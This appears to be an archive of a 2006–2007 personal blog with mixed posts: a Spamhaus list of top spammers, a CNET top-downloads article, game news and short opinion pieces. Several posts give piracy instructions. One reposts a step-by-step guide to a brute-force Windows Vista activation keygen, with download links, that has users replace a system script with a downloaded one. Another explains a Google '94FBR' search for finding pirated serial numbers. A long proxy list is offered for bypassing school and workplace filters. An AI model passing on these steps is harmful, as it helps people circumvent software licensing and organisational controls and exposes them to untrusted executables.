"The astronomically high odds against winning have also led to the epithets of a "tax on stupidity", "math tax" or the oxymoron "voluntary tax" (playing the lottery is voluntary; taxes are not). They are intended to suggest that lotteries are governmental revenue-raising mechanisms that will attract only those consumers who fail to see that the game is a very bad deal. Indeed, the desire of lottery operators to guarantee themselves a profit requires that a lottery ticket be worth substantially less than what it costs to buy. After taking into account the present value of the lottery prize as a single lump sum cash payment, the impact of any taxes that might apply, and the likelihood of having to share the prize with other winners, it is not uncommon to find that a ticket for a typical major lottery is worth less than one third of its purchase price." - http://en.wikipedia.org/wiki/Lottery

Thursday, March 29, 2007

Windows Vista cracked, brute force keygen available to generate authentic activation key

According to keznews.com:

"This has been reported to work!......look at the following user comments!!!

zapp2 wrote: This WORKS WORKS WORKS WORKS WORKS WORKS WORKS
2 min a go I ACTIVATED VISTA HOME BASIC..... Shocked Shocked Shocked
Computer User U are the BIG MAN Very Happy Very Happy Very Happy Very Happy Very Happy

CodeCrapper wrote: I GOT A VALID KEY FOR MY VISTA BUSINESS!!!!!! Very Happy Very Happy Very Happy

salmypal wrote: 5 hours and i got 3 legit keys. will leave it on for 2 days and will keep letting everyone know. need one ? i'll give only if your a long time keznews user. Wink

Nice easy to follow instructions thanks guys:

1: download the file slmgr.zip (links below)

2: make a backup of C:\windows\system32\slmgr.vbs (in case the keygen works, replace it back with the original)

3: use slmgr.vbs from the zip-file to replace the one in C:\windows\system32\. If you have problems with permissions, select file...goto properties....take ownership....then change permissions.

4: write down your partial or entire productkey. You can check your key with "magic jellybean" (from our pack)

5: goto Start > Run, type "cmd" and OK. Now type "C:\windows\system32\slmgr.vbs -ipk generate". A process called "wscript.exe" will start and can take quite a lot of CPU resources. It will check aprox. 10000 keys per 30 minutes.

6: now the waiting begins. It can take very very very long before you get some results

7: after some time (hours, days) check your productkey with "magic jellybean" again to see if it has changed

8: if your serial has changed try to activate Vista by going to Start > Run. Now type the command "C:\windows\system32\slmgr.vbs -ato"

DONE!

KEYGEN PROVIDED BY COMPUTER USER!...thanks fokes for your "patience!" Laughing

DISCLAIMER: under no circumstances should anyone sell the key that they generate. I do not support Piracy, this was simply an experiment in which i used to practice my vbscripting. This was just for fun and was a complete accident! sorry for cracking your beautiful operating system BILL GATES

I strongly encourage everyone to purchase windows vista, and be a genuine customer!

Download for education purposes only:
http://rapidshare.com/files/18822988/Brute_Force_Keygen.rar.html (link 1)
http://www.megashare.com/120345 (link 2)
http://www.megaupload.com/?d=TGXWL7SQ (link 3)
"

Monday, January 22, 2007

The Top 10 hardcore career spammer

Up to 80% of spam targetted at Internet users in North America and Europe is generated by a hard-core group of around 200 known professional spam gangs whose names, aliases and operations are documented in Spamhaus' Register Of Known Spam Operations (ROKSO) database.

This TOP 10 chart of ROKSO-listed spammers is based on those Spamhaus views as the highest threat, the worst of the career spammers causing the most damage on the Internet currently. Spamhaus flags these as a priority for Law Enforcement Agencies.

The world's worst spammers and spam gangs this week are:

The 10 Worst ROKSO Spammers As at
22 January 2007
Rank Photo Spammer or Spam Gang Country
1
Alex Blood / Alexander Mosh / AlekseyB / Alex Polyakov
So many Alex & Alexey spamming! Alex Blood tied to Pilot Holding & bbasafehosting.com long ago, then Alex Polyakov posted he owned them. Massive botnet and child-porn spam ring, also pharma, mortgage, and more. May work with Kuvayev and Yambo.
Ukraine
2
Leo Kuvayev / BadCow
Russian/American spammer. Does "OEM CD" pirated software spam, copy-cat pharmaceuticals, porn spam, porn payment collection, etc. Spams using virus-created botnets and may be involved in virus distribution.
Russia
3
Michael Lindsay / iMedia Networks
Lindsay's iMedia Networks is a full-fledged spam-hosting operation serving bulletproof hosting at high premiums to well known ROKSO-listed spammers. His customers spam via botnet zombies with spam payloads hosted offshore, tunneled back to his servers.
United States
California
4
Ruslan Ibragimov / send-safe.com
Stealth spamware creator. One of the larger criminal spamming operations around. Runs a CGI mailer on machines in Russia and uses hijacked open proxies and virus infected PCs to flood the world with spam.
Russia
5
Amichai Inbar
Full scale criminal operation. Spamming porn, illegal drugs and pump-&-dump stock using botnets. Partnered with many of the worst US and Russian ROKSO spammers.
Israel
6
Pavka / Artofit
A Russian gang who have been spamming for years. Started with porn, now into many types of spam, always via hijacked PCs. Part of a large criminal group involving ROKSO spammers Leo Kuvayev & Alex Blood. Also see "Yambo Financials" ROKSO.
Russia
7
Vincent Chan / yoric.net
Vincent Chan and his Chinese partners have been sending spam for years. They mainly do pharmacy, and are able to send out huge amounts daily. The use a vast amount of compromised machines, for sending, hosting and proxyhijacking.
Hong Kong
8
Alexey Panov - ckync.com
Spamming, spammer hosting, spamware peddlers. Author of the DMS spamware that uses hijacked open proxies and virus infected PC to flood the world with spam.
Russia
9
Yambo Financials
Huge spamhaus tied into distribution and billing for child, animal, and incest-porn, pirated software, and pharmaceuticals. Run their own merchant services (credit-card "collection" sites) set up as a fake "bank."
Ukraine
10
Jeffrey Peters - JTel / CPU Solutions
Convicted felon, hard-core spammer host, Peters is also behind a fake Russian "ISP" serving many criminal ROKSO spammers. Forged documents seem to be among his specialties.
United States
Florida

Source: Register Of Known Spam Operations (ROKSO) database + Spamhaus Blocklist (SBL) database. Detailed records on each spammer or spam gang listed can be viewed by clicking on the hyperlinks above.

Wednesday, January 17, 2007

A large collection of free proxy, bypass firewalls! surf anonymously!

Proxy Bypasser
The majority of the users are people trying to bypass their school or business's filters. Also used to surf the web anonymously.

http://www.xanproxy.be/ - no ads except the first page.
http://ieproxy.com/ - no ads.
http://www.techtakeover.com/search/ - no ads.
http://www.spysurfing.com/ - no ads except front page.
http://www.myfreeproxy.be/ - ads on the front page
http://worldwideproxy.com/ - no ads.
http://www.proxytastic.com/ - contains ads.
http://www.nomorelimits.net/ - contains ads.
http://www.proxifree.com/ - contains ads.
http://browseatwork.com/ - contains ads, but clean looking
http://www.netsack.net/ - clean looking but with popup ads.
http://www.afreeproxy.com/ - contains ads.
http://cgi-proxy.net/ - contains ads on the first page, slow.
http://www.coveredtracks.com/homepage.php - no ads. but rugged site.
http://www.easyproxy.org/ - no ads except the first page.
http://www.privatizer.net/ - contains ads on the first page.
http://www.secure-tunnel.com/ - no ads.
http://www.spiderproxy.com/ - no ads.
http://thestrongestlinks.com/ - contains ads on the first page, slow.
http://www.unipeak.com/ - slow, no ads.
http://betaproxy.com/ - contains ads.
http://proxy7.com/ - contains ads.
http://webwarper.net/ - contains ads.
http://www.chronicpulse.net/ - contains ads.
http://www.space.net.au/~thomas/quickbrowse.html - multiple proxys
http://www.proxyking.net/ - contains ads.
http://w3privacy.com/ - contains ads.
http://freeproxy.us/ - contains ads.
http://www.goproxing.com/ - contains ads.
http://greenrabbit.org/ - contains ads but small ads
http://hujiko.com/ - contains ads.
http://poxy.us.to/ - no ads.
http://hidemyass.com - no ads except front page.
https://proxify.com/ - contains ads.
http://projectbypass.com/ - contains ads and popups.
http://www.proxymouse.com/ - contains huge ads.
http://letsproxy.com - contains ads.
http://www.the-cloak.com/login.html - no ads.

Update:
Thanks to the anonymous poster.

Secure pages and with no ads:

https://www.stday.com/cgi-bin/nph-proxyb.cgi/
https://www1.ft888.net/cgi-bin/nph-proxyb.cgi/
https://www2.ft888.net/cgi-bin/nph-proxyb.cgi/
https://www3.ft888.net/cgi-bin/nph-proxyb.cgi/
https://www.secure-tunnel.com/SafeBar/safebar.cgi/ (also available via http://)
https://www.dongtaiwang.com/cgi-bin/nph-proxyb.cgi/
https://www1.dongtaiwang.com/cgi-bin/nph-proxyb.cgi/
https://www2.dongtaiwang.com/cgi-bin/nph-proxyb.cgi/
https://www3.dongtaiwang.com/cgi-bin/nph-proxyb.cgi/
https://towel.greyfyre.info/proxy/index.php


Insecure pages (mostly no ads):

http://pbkill.com/scgi-bin/nph-proxy.cgi
http://darwin.servehttp.com/cgi-bin/cgiproxy/nph-proxy.cgi
http://www.brainflux.org/cgi-bin/nph-proxy.cgi
http://starkravingmad.org/nph-proxy.cgi/
http://barracuda.tx.envision7.com/~admin46/cgi-bin/nph-ih4x.cgi
http://www.q2r.net/pc/nph-proxy.cgi
http://www.e-ronin.com/cgi-bin/shared/nph-proxy.cgi
http://www.groothuijsen.nl/cgiproxy/nph-proxy.pl/
http://www.vtunnel.com/nph-proxy.pl - with a little ad but still ok.
http://70.84.193.226/nph-86prox.pl
http://www.neoambient.com/86prox/
http://www.ipent.com/ihfc/nwochat/projectshadow/buttons/nph-proxy.cgi/ - contains ads, encodes url.
http://www.q2r.net/pc/nph-proxy.cgi


PHProxies:

http://www.arnit.net/utilities/webproxy/new/ - contains ads on the first page.
http://www.browseany.com/ - contains ads.
http://www.zhaodaola.org/web/ - contains ads.


No Input box by default:

http://www.gouc.fr/cgi-bin/nph-proxy.cgi - no ads, french language.
http://heshan18.com/cgi-bin/nph-proxyb.cgi - no ads.


No images:

http://www.floon.com/cgiproxy/nph-proxy.pl/


Other pages with ads:

http://www.netshaq.com/cgiproxy/nph-proxy.cgi/ - no input box by default
http://www.proxy-surf.com/nph-proxy.pl/
http://www.bywhat.com/ - lots of ads.
http://www.fireprox.com/nph-proxy.pl/ - same as above.
http://www.nethider.com/cgi-bin/nph-proxy.cgi - popups, ads taking half of the browser space.
http://www.safesurfers.net/
http://www.usbm.de/cgi-bin/userbeam.pl/ - popup, ads, no images.
http://proxy.perlproxy.com/p/
http://proxy.cecid.com/p/

Quick update:
http://www.twobeep.com/ - no ads.

Update
Thanks to alex-and-r, RandomC, and an anonymous poster

http://www.guardster.com/ - contains ads.
http://concealme.com - contains ads.
http://www.twobeep.com/ - no ads.

Update:

http://anonymizer.nntime.com/
http://radiofarda.be

Update:
thanks hybridstorm

http://ibypass.org - contains ads. (also available as .com .net .tk)


For corrections, additions, please submit comments. Thanks.

Top 10 most downloaded file in the past 10 years according to CNET

Top 10 downloads of the past 10 years

By Kelly Green Morrison and Karen Whitehouse, Download.com
When CNET Download.com opened its doors in 1996, it was home to 3,000 small shareware and freeware applications. Online software distribution was still in its infancy. What a difference a near-decade makes! Since 1996, we've watched the rise of instant messaging, digital audio and the MP3 format, file sharing, spyware and antispyware, and the open-source movement, just to name a few. And we've watched as online software distribution has gone from pipe dream to reality. These 10 applications best represent the top trends in downloading over the past decade.

ICQ

Today instant messengers are ubiquitous, but when ICQ ("I Seek You") was first released in 1997, it was truly the first of its kind. Though competitors such as Yahoo Instant Messenger and AIM have since encroached on ICQ's territory, this chat client remains enormously popular with international users, and it has remained one of Download.com's most popular applications since its launch.

Winamp

Arriving fast on the heels of the emerging MP3 digital format, Nullsoft's Winamp was one of the darlings of the burgeoning digital audio scene in the late '90s. This free audio player quickly gained popularity, becoming one of the most popular files on Download.com, and Nullsoft was eventually acquired by AOL in 1999.

CNET community's

Top 10 downloads






Napster
Who doesn't remember this controversial file-sharing kingpin? Developed by Northeastern University student Shawn Fanning, Napster was a groundbreaking application that enabled users to share MP3s painlessly for the first time through a peer-to-peer network. Napster has since been sued, shuttered, and reborn as a subscription music service, but its legacy remains.
Firefox
Developed by the open-source Mozilla project in 2003, Firefox was the first browser to show the promise of breaking Microsoft's stranglehold on the browser market. Lightweight, secure, and packed with useful features, Firefox exemplifies the promise of the strengthening open-source movement.

WinZip
When CNET Download.com launched in 1996, WinZip was among the first programs in our library, and in the past nine years, it has remained near the top of our Most Popular list. The reason is simple: For many years, WinZip was an essential utility. You couldn't download or send large files without it. Even the fact that Windows XP now has built-in ZIP support hasn't diminished its popularity. The keys to WinZip's success are its simplicity and its singularity of purpose: it does one thing--compressing and decompressing files--and it does it very well.
iTunes
Apple's music player and organizer makes our top 10 list for the sheer beauty of its product design. iTunes is not only a full-featured media player and library in its own right, it's also the gateway for Apple's iPod and popular music store, creating an elegant and simple interface for buying and organizing music. If only all software were this easy to use.
Ad-aware
Almost as soon as there was software to download, there was adware coming along for the ride. Lavasoft did its part to hold the line with Ad-aware, a spyware scanner and remover. Its simple interface and excellent results have gained the program acclaim over the past five years, including a recent monopoly on the No. 1 slot in Download.com's Most Popular list. We wouldn't download files without it, and apparently, neither would most of you.

Skype
If Internet signals can travel over a phone line, then voice calls can travel over the Internet, right? With a Voice-over-IP (VOIP) program such as Skype, they certainly can. The prospect of making free calls to folks all over the globe has persuaded millions of people to install the software; the ease of use and surprising voice quality have earned Skype a loyal user base and accolades that include a CNET Editors' Choice and a Webby.
RealPlayer
Ten years ago, the Web was full of static content. The 1995 debut of RealPlayer changed all that. Streaming audio and video in a free media player was a bold step forward into making the Internet a viable entertainment platform, and RealNetworks was there. Today the software plays almost every media format, and the online music store sells tunes compatible with most MP3 players--even the iPod. RealPlayer hasn't always been at the head of the class, but it was there first, and it keeps adapting to the developing world of online media.

Adobe Acrobat Reader
Bridging the gap between print and Internet publishing, Adobe's portable document format (PDF) lets publishers distribute their articles, newsletters, and documentation online without worrying about formatting problems or unauthorized alterations. By giving away the Acrobat Reader early on, Adobe helped create a nearly unassailable market position. If you want to read magazine archives or software manuals online, you need Acrobat Reader--as its nearly seven-year occupation of the Most Popular list can attest.

EA introduces "Sims game" for laptops

LOS ANGELES, California (Reuters) - Electronic Arts Inc. (ERTS.O: Quote, Profile , Research) on Tuesday announced a new line of video games called "The Sims Stories" aimed at the laptop-toting youth market as it strives to deliver a bigger proportion of titles based on more lucrative company-owned material.

Players of "The Sims" control virtual people called Sims as they sleep, eat, cook, socialize, buy things and work.

"The Sims" is the No. 1 franchise at EA, the world's biggest video game publisher, which has sold more than 70 million games globally since 2000. It also has a broader audience than most games. Half of its players are female -- unlike most commercial video game audiences, who are mostly male.

"The Sims Life Stories" is the first in the new series and is due in the United States and Europe in the first week of February.

"The Sims Pet Stories" and "The Sims Castaway Stories" are scheduled to ship in mid-2007 and late 2008, respectively.

EA aims to use the new titles to expand the "Sims" audience to more casual players and is targeting multitasking MySpace teens and consumers in their early 20s with the new games.

"The Sims Life Stories" has a comic-romantic plot and offers a new story mode, which runs through 12 chapters of a set story line, while also supporting the franchise's traditional open style of play.

All of "The Sims Life Stories" games are designed to run on laptops and do not require upgraded graphics cards, as many PC games do. The games can also be played for hours or minutes in a window while other programs, such as instant messaging or e-mail, run simultaneously.

Monday, December 25, 2006

Muslims forced to lift veil at airports

"VEILED women will be forced to reveal their identities at UK airports under a government plan to tighten security, Scotland on Sunday can reveal. - And they should..It would be like trying to walk thru airport security with a ski mask on!!"

Why not? Religion does not come before law, if the law demands to show their identity, then they will, no special treatment should be given.

Read the Story

Sunday, December 17, 2006

How to get serial numbers easily

Google serial number query

Get in google and search for "program name" 94FBR
In "program name" write the name of the program that you want the serial for, without the ""
There you go, your serial!

How it works...

Quite simple really. 94FBR is part of a Office 2000 Pro cd key that is widely distributed as it bypasses the activation requirements of Office 2K Pro. By searching for the product name and 94fbr, you guarantee two things.
1) The pages that are returned are pages dealing specifically with the product you're wanting a serial for.
2) Because 94FBR is part of a serial number, and only part of a serial number, you guarantee that any page being returned is a serial number list page.

Check out these for example...
"Photoshop 7" 94FBR
"Age of Mythology" 94FBR
"Nero Burning Rom 5.5" 94FBR

Enjoy

Wednesday, December 06, 2006

Nice Folding Bike

This bike looks awesome:


"World's smallest bicycle", "Folds in 5 seconds". Seems to be perfect for commuting or joy riding in D.C. or any large city.

Monday, December 04, 2006

Increasing minimum wage to $7.50/hr US hurts teens, creates disemployment

"Chicago School Economist Becker and Judge Posner blog that the majority of minimum wage earners are wives earning pin money, part-timers, retirees supplementing incomes, teenagers getting work experience (References svp). Raising minimum wage will hurt the "really" poor."

Well, it is probably true. No serious full time workers earn minimum wage, even supermarket cashiers earn about $10/hr on average. Those who earn the minimum wage are part-timers or students. Raising the minimum wage will decrease the number of minimum wage jobs available and hurt these people.